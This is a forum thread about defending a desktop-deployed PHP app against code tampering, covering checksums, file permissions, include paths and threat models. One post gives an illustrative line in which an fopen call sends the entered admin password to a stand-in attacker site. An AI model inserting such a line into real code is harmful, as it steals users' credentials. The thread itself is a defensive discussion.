Is there a way to verify integrity of php/javascript code

Han wrote:

Our app runs on end-users machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.

Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?

What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

Thanks for your help
-Han

the md5 of the files would change completly if it was tampered with at
all.

you can use the php 'md5("path/to/file")' function to check the
integrity of files through php.

hope this helps.

iwp

>Our app runs on end-users machines (apache2.x + php5). At this moment

it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.
If you put sensitive info that you don't want end-users to see on
end-user machines, they don't have to "steal" it, you already gave
it to them.

And why would they need access to the console if they can log in
remotely?
Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?
Anyone modifying the code can simply see what the hash is on
unmodified code and then modify the code to always send that. Or
they can modify the code to do the hash on an unmodified copy which
is never run.
What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

You can't. Remember, if the user can view your code on a display,
then someone can aim a webcam at that display and send it anywhere.

You could try using a tamper-proof smart card, but I don't know of any
of those with a graphical display or with networking capabilities.

Gordon L. Burditt

>> Our app runs on end-users machines (apache2.x + php5). At this moment

it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.

Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?

What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

Thanks for your help
-Han

the md5 of the files would change completly if it was tampered with at
all.

you can use the php 'md5("path/to/file")' function to check the
integrity of files through php.

Until, of course, someone modifies their copy so that the path/to/file
points at an *unmodified* copy which is never run but is only used
to pass the integrity check.

Gordon L. Burditt

A simpler attack would be to disable that check.

I guess the solution has to be outside of php. I cannot figure out a
solution though.

-Han

Gordon Burditt wrote:

Our app runs on end-users machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.

Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?

What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

Thanks for your help
-Han

the md5 of the files would change completly if it was tampered with at
all.

you can use the php 'md5("path/to/file")' function to check the
integrity of files through php.

Until, of course, someone modifies their copy so that the path/to/file
points at an *unmodified* copy which is never run but is only used
to pass the integrity check.

Gordon L. Burditt

We are not trying to hide sensitive data that belongs to us. The
sensitive info is the users' data (e.g., their passwords).

Are you saying that this is theoretically impossible? Then we should
just find a solution that makes the hacker's life more difficult.

We cannot be the first one running on to this problem. There must be a
solution that doesnt require temper-proof smart cards.

Thanks
-Han

Han wrote:

We are not trying to hide sensitive data that belongs to us. The
sensitive info is the users' data (e.g., their passwords).

Don't store passwords. Problem solved.
Cheers,
NIcholas Sherlock

>We are not trying to hide sensitive data that belongs to us. The

sensitive info is the users' data (e.g., their passwords).
Does the admin of the server on which the PHP code is running want
the check to work, or does he want to subvert it?

If it's a user's password, why is it in the PHP script (as distinguished
from a database)? Or are you talking about passwords users enter
into their clients to log in?
Are you saying that this is theoretically impossible? Then we should
just find a solution that makes the hacker's life more difficult.
If the *SERVER ADMIN* is trying to compromise your code (e.g. it's
some kind of copy protection or licensing check), you don't have
much chance of stopping it. The same applies to a hacker who manages
to get root on the box and who spends enough time to understand the
problem. Pre-scripted attacks are much easier to stop. Another approach
is to put a key part of the operation of the system on a server *YOU*
control, so, for instance, if an activation key gets posted on the
Internet and is widely abused, you can deactivate it.

Doing something like opening the file $_SERVER['PHP_SELF'], computing
a checksum of it, and checking it against a known value is easily
defeated by a human who understands the code, but it will trip up
a virus that simply sticks logging code at the beginning of the
script to leak passwords to a remote (evil) system, at least until
your technique becomes so common that it's worth writing an attack
to defeat it. Oh, yes, you probably have to checksum all of the
file EXCEPT the part containing the 'correct answer', as computing
the checksum of the script when it already contains the answer you're
trying to compute is intentionally difficult, so you might checksum
all but the first line, and the first line is:
<?php $md5sum='a37862648cde79877987383992';

It would work better if you can introduce a system that can be
considered secure. For example, you don't just check the checksum
of the script *in the script*, you also output it to the browser
(perhaps hidden in a HTML comment). Your customer registers his
URL where he installs the script with you, and you poll them all,
verifying the checksum. If it changes, you raise an alarm. We're
assuming that the hacker can't get your customer's server and your
monitoring system at the same time, so replacing the 'correct answer'
is harder to do. Nagios is a nice monitoring system that can run
all sorts of periodic remote checks on your network (like that your
web server is up, that your cert is not expired, and you could do
just about any check on a web page returned that you can write a
script to verify).
We cannot be the first one running on to this problem. There must be a
solution that doesnt require temper-proof smart cards.

Tamper-proof smart cards are needed where the holder of the card wants
to cheat the system and there's enough monetary incentive for him
to use a lot of effort trying to do so. I originally thought this
was the situation you were describing, apparently I misinterpreted
what you wanted.

Gordon L. Burditt

Passwords are not stored in plaintext. However, still it's a 2 secs job
to change this line
if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
to
fopen('http://www.badhackerssite.com/'.$_REQUEST['pass'], "r");
if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
The admin password is leaked the next time user logs in.
[excuse the syntax errors]

Nicholas Sherlock (n_********@hotmail.com) wrote:
: Han wrote:
: > We are not trying to hide sensitive data that belongs to us. The
: > sensitive info is the users' data (e.g., their passwords).

: Don't store passwords. Problem solved.
To be a little clearer, do not store unencrypted passwords, only store the
crypt or md5 checksum of a password.

Use two way encryption of important data like credit card numbers. If the
hardware is stolen then it is much harder to steal the data. If possible
require a person to enter the decrypt password for data. Either when the
system starts up so that the decrypted data is never available except
within the memory of the running computer after a bootup by an authorized
person (though the virtual memory paging file must be considered as well).
Or decrypt the data just as needed, where each set of data has a password
specific to what ever person is authorized to access that data.

Store important data on a "more secure" server (in this case - yours), and
access it through a VPN that requires a manual password.

Combine the two, so that (for example) a cronjob reads a hard coded
password but only via a secure (i.e. encrypted) link to a another computer
at a different location.

However, if any person has access, either physical or remote login with
any privileges (intended or not) then the program and the data can never
be completely protected.

One very common strategy to solve this is to make the system and data
available only to people that are trusted. "trusted" actually means back
ground checks (criminal record checks etc), signed contracts, security
clearances, two key signins, etc etc. continual review of security
procedures and policies. (That is all the stuff that allow large
companies to charge outrageous prices.)

Another strategy used in some settings - the server hardware does not
belong to the customer. The seller (you in your example) still owns the
hardware. The customer has no privileged access, but does have physical
control of the box. You login remotely to do upgrades etc, or other
maintenance. They might control your remote access by physically
disconnecting your connection to the box, and possibly monitoring your
connection when you work on it (you'll need to use a challenge/response
login if they monitor your access).

--

This programmer available for rent.

>Does the admin of the server on which the PHP code is running want

the check to work, or does he want to subvert it?
The admin (the user) wants the check to work.
We are trying to protect the user from the cleaning lady, daughter's
boyfriend, the intern, trajan horses, etc.
If it's a user's password, why is it in the PHP script (as distinguished
from a database)? Or are you talking about passwords users enter
into their clients to log in?

I'm talking about the password that user enters to login.

Your md5 suggestion is doable.
Is there a way to force php interpreter to check it?

How do website admins currently protect the php at their site has not
been changed by the interns, isp's, programmers, consultants, etc?

Is this an advantage of compiled code over interpreted code?

If yes, then I guess php was the wrong choice for writing code that
runs on desktop machines.

Thanks
-Han

Han wrote:

How do website admins currently protect the php at their site has not
been changed by the interns, isp's, programmers, consultants, etc?

Don't give them the password.

Cheers,
Nicholas Sherlock

Han wrote:

Our app runs on end-users machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.

Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?

What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

Thanks for your help
-Han

Normal security measures are often taken on the web server. They include:
- making php files "execute only", so it is very difficult to download
ands investigate them.
- storing passwords, encrypted, somewhere outside of the public web
space. That makes them accessible for the server only. If you could
insert code, you would still need some inside info to find them.
Especially if the password file is called "packman.exe" instead of
"passwords.txt".
- allow uploading only on directories that do not have execute rights.

Off course, it does not stop the need for a PHP programmer to check the
URL request and the POST parameters for injections.

Best regards

Han (go********@safeblue.com) wrote:
: Passwords are not stored in plaintext. However, still it's a 2 secs job
: to change this line
: if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
: to
: fopen('http://www.badhackerssite.com/'.$_REQUEST['pass'], "r");
: if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
: The admin password is leaked the next time user logs in.
: [excuse the syntax errors]
It's only a 2 secs job if the computer is not secure. If you can't trust
the people with privileged passwords then you're stuck.

In that case, you may wish to have a second "more trusted" person to audit
the computer at random intervals using a check sum program to identify
changes and inspect them. (This is a good idea anyway to identify hacker
intrusions, and to catalog exactly when other changes occured).

--

This programmer available for rent.

I see. The solution must be outside the realm of php.

In our case, this solution wont work as our program runs on user's
desktop.

There is no trusted person (first or second).

- making php files "execute only or read only" seems to be a good
solution. Would that work on windows xp? Would this require ntfs?

Han wrote:

- making php files "execute only or read only" seems to be a good
solution. Would that work on windows xp? Would this require ntfs?

I am not a Windows XP expert, but you can probably do that. If you
switch on the Windows-NT-like authentication, you can define a user on
your system that will be used as the web user. After that, you configure
your webserver to use that user's privileges.
You can probably set general directoy permissions from your web server
program as well.

Dikkie Dik (no****@nospam.org) wrote:
: Han wrote:
: > - making php files "execute only or read only" seems to be a good
: > solution. Would that work on windows xp? Would this require ntfs?
: >
: I am not a Windows XP expert, but you can probably do that. If you
: switch on the Windows-NT-like authentication, you can define a user on
: your system that will be used as the web user. After that, you configure
: your webserver to use that user's privileges.
: You can probably set general directoy permissions from your web server
: program as well.

Ah yes, but which person is he going to trust to set that up? Apparently
there is no trusted user at the computer.

Also, yes, xp can certainly do that sort of securtiy with ntfs (which is
the default file system by the way) - but beware of XP home. The default
security settings are that an account is either non-priv or priv, and
since many things like games (from MS even) require priv's, you're liable
to have (or end up with) numerous priv accounts on an xp home machine.
Those priv account holders can do anything if they set their minds to it.
(Perhaps xp home edition can change that aspect of how it works, no idea,
but you still have to have someone you trust to do that.)

--

This programmer available for rent.

After long discussions here and through the help of the people in this
board as well, here is what we are going to do. I hope this helps other
people who would deploy a php based solution at user's desktops.

1. We'll make the files read-only (execute-only wont work right?)
2. We'll move all password related questions to a compiled code
(C/C++). We'll make this non-browser based, so the user is not subject
of a simple fishing attack.
3. At the time when the password is asked (before or after), the
compiled code will go over the php installation and check the md5 (or
sha1) of all the php/javascript code.
4. If there is no mismatch, the password is passed to php

There is only one question we couldnt answer at this moment which is
the following: what are the files for which we need to check.

Is PHP monotonic? By that we mean does adding a file to a directory
changes the behavior of php. If the compiled program checks only the
files we created (php/javascript), is it possible to someone to insert
a file in our directory to change the behavior of php? Is there a file
that I can create that redirects php to a different directory?

>After long discussions here and through the help of the people in this

board as well, here is what we are going to do. I hope this helps other
people who would deploy a php based solution at user's desktops.

1. We'll make the files read-only (execute-only wont work right?)
If you make it execute-only, PHP can't read it (the same issue
applies to shell scripts and other interpreted languages).

Ideally the files should be owned by a user *other* than the one
that Apache/PHP runs as, so a hole in Apache or PHP still won't
let them change the permissions on the files.
2. We'll move all password related questions to a compiled code
(C/C++). We'll make this non-browser based, so the user is not subject
of a simple fishing attack.
3. At the time when the password is asked (before or after), the
compiled code will go over the php installation and check the md5 (or
sha1) of all the php/javascript code.
4. If there is no mismatch, the password is passed to php

There is only one question we couldnt answer at this moment which is
the following: what are the files for which we need to check.

Is PHP monotonic? By that we mean does adding a file to a directory
changes the behavior of php. If the compiled program checks only the
files we created (php/javascript), is it possible to someone to insert
a file in our directory to change the behavior of php? Is there a file
that I can create that redirects php to a different directory?

PHP uses an include search path. If you add a file being searched
for to a directory earlier on the search path, you get that file
instead of the one you otherwise would have gotten. This might
cause problems.

The Apache config file can change the document root directory for
a site, and it can change some of the parameters for PHP. This
file also tends to get tinkered with a lot. Some systems I administer
generate it from a database every half an hour (provisioning code
that adds/removes virtualhosts), and it might really change a few
times a week.

php.ini is also critical. Under some circumstances, which may
vary with your Apache config file, a .htaccess file can change
PHP parameters, including whether .php files are interpreted
as PHP or something else.

Gordon L. Burditt

Han wrote:

Our app runs on end-users machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.

Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?

What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

Thanks for your help
-Han

Use ZEND Optimizer to encode it...?

Following on from Han's message. . .

Our app runs on end-users machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.

Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?

What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

Thanks for your help
-Han

There are four issues which will have varying importance for you.
1 Detecting an intrusion/abnormal activity/ code change
2 Preventing an intrusion/abnormal activity/ code change
3 Verifying the /system/ does what it is supposed to
4 Preventing information leaks
These are very different things but need to be considered together.

Example: You have a program that through some magic sets off an alarm
when it is tampered with or used by an unauthorised person. Job done?
No.
Mr. Blackhat takes a copy and disassembles it in his workshop,
neutralises the alarms and modifies the code (which might be accessing
the database say) for his own purposes. Then he runs the copy as a
separate program and has cracked open the database or establishes a fake
trust or whatever. The original program is running perfectly smoothly
and you may never know all your doors are being unlocked by a duplicate
key. (Oh and Mr.Blackhat is not a terrorist or industrial spy but a
disgruntled employee who only wants to change the master password so
your data is inaccessible.)

A book could be written on the subject.

It has been written on the subject:
Security Engineering by Ross Anderson pub. Wiley.
It does deal a bit with technology and privacy and methods, but the
really important message is that you need to start with a threat model
and develop a set of methods for dealing with those threats... ...but
don't expect anything to be watertight. The two classic mistakes are
protecting the wrong thing from the wrong people and /relying on/
security by obscurity. This book is excellent because it makes security
*interesting* and so there's more hope that people will make the effort
to study it, keep up with state of the black art and recognise that it
needs investment.

--
PETER FOX Not the same since the icecream business was liquidated
pe******@eminent.demon.co.uk.not.this.bit.no.html
2 Tees Close, Witham, Essex.
Gravity beer in Essex <http://www.eminent.demon.co.uk>

Han wrote:

Our app runs on end-users machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.

Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?

What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

The only way to secure this is to not put the program on the enduser
machines. Make it a proper client server app. Have the PHP on the
server only and properly secured.

You _might_ be able to secure some of the data if it's in a SQL database
and you set the permissions so that sensitive data can never be
retrieved with the username/password used to access the database. In
fact, you should be doing this even if the program is running on the
server side.

And no, a compiled program won't actually improve your security. Your
problem isn't in the type of program being executed. Your problem is
your complete lack of a proper security model.

--
Rossz
God kills a kitten each time someone uses Internet Explorer